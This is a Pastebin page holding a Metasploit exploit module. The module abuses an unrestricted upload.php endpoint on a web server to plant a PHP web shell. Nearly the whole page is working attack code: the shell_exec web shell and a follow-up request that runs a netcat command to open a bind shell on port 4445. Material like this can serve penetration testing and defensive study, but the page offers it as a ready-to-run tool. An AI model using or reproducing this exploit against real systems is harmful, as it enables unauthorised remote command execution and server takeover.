SHARE
TWEET

super cool msf module

a guest Dec 30th, 2014 300 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. ##
  3. # This module requires Metasploit: http//metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
  9. class Metasploit3 < Msf::Exploit::Remote
  10.   Rank = ExcellentRanking
  11.  
  12.   include Msf::HTTP::Wordpress
  13.   include Msf::Exploit::FileDropper
  14.  
  15.   def initialize(info = {})
  16.     super(update_info(info,
  17.       'Name'           => 'Super cool shell upload',
  18.       'Description'    => %q{
  19.                 This is super cool module for Metasploit to check if you can upload shell on target.
  20.       },
  21.       'Author'         =>
  22.         [
  23.           'HauntIT Blog'     # metasploit module
  24.         ],
  25.       'License'        => MSF_LICENSE,
  26.       'References'     =>
  27.         [
  28.           [ 'URL', 'http://HauntIT.blogspot.com']
  29.         ],
  30.       'Privileged'     => false,
  31.       'Platform'       => ['php'],
  32.       'Arch'           => ARCH_PHP,
  33.       'Targets'        => [ ['Any vulnerable upload ', {}] ],
  34.       'DefaultTarget'  => 0,
  35.       'DisclosureDate' => '28/12/2014'))
  36.   end
  37.  
  38.  
  39.   def check
  40.     readurl = normalize_uri(target_uri.path, 'upload','upload.php')
  41.     res = send_request_cgi({
  42.       'uri'    => readurl,
  43.       'method' => 'GET'
  44.     })
  45.  
  46.     if res.code != 200
  47.       return Msf::Exploit::CheckCode::Unknown
  48.     end
  49.  
  50.     return Msf::Exploit::CheckCode::Safe
  51.   end
  52.  
  53.   def exploit
  54.     payload_name = "#{rand_text_alpha(10)}.php"
  55.  
  56.     shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"
  57.  
  58.     uri = normalize_uri(target_uri.path, 'upload','upload.php')
  59.  
  60.     data = Rex::MIME::Message.new
  61.     data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")
  62.  
  63.  
  64.     post_data = data.to_s
  65.  
  66.     payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)
  67.  
  68.     print_status("#{peer} - Uploading payload to #{payload_uri}")
  69.     res = send_request_cgi({
  70.       'method'   => 'POST',
  71.       'uri'      => uri,
  72.       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
  73.       'vars_post' => { 'plik' => '#{payload_name}' },
  74.       'data'     => post_data
  75.     })
  76.  
  77.     if res.code != 200 || res.body =~ /Blad/
  78.       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
  79.     else
  80.       print_status("Got shell ;>")
  81.     end
  82.  
  83.     print_status("#{peer} - Executing payload #{payload_uri}")
  84.     res = send_request_cgi({
  85.       'uri'    => payload_uri,
  86.       'method' => 'GET',
  87.       'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
  88.     })
  89.  
  90.  
  91.   end
  92. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top